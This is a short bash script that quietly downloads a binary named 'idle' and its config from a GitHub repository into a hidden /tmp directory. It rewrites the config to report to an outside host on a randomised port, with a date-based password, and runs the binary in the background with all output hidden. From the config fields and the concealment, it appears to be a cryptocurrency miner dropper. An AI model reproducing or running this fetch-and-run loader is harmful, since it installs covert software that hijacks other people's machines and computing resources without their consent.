#!/bin/bash

port="1130"
host="dyn.dream.avspic.com"
url="https://github.com/pakoinake/jzoax/raw/refs/heads/main"
work=`ls -t1 /tmp/.*/config.json 2>/dev/null |head -n1`
[ -n "$work" ] && work="${work%/*}" || work=`mktemp -d -t .XXXXXXXXX`

portAdd="$(( $(od -An -N1 -tu1 /dev/urandom) % 10 ))"
port="$((port + portAdd))"
name=`TZ=":Asia/Shanghai" date '+%Y%m%d'`

[ -d "${work}" ] || exit 1
# trap "rm -rf ${work}" EXIT
cd "${work}"
if [ ! -f "./idle" ]; then
  curl -sSLo "idle" "${url}/idle" 2>/dev/null
  [ -f "config.json" ] || curl -sSLo "config.json" "${url}/idle.json" 2>/dev/null
  [ -f "config.json" ] && [ -n "$host" ] && [ -n "$port" ] && sed -i "s/\"url\":.*,/\"url\": \"${host}:${port}\",/g" "config.json"
  [ -f "config.json" ] && [ -n "$name" ] && sed -i "s/\"pass\":.*,/\"pass\": \"${name}\",/g" "config.json"
fi
chmod -R a+x ./
./idle >/dev/null 2>&1 &
wait
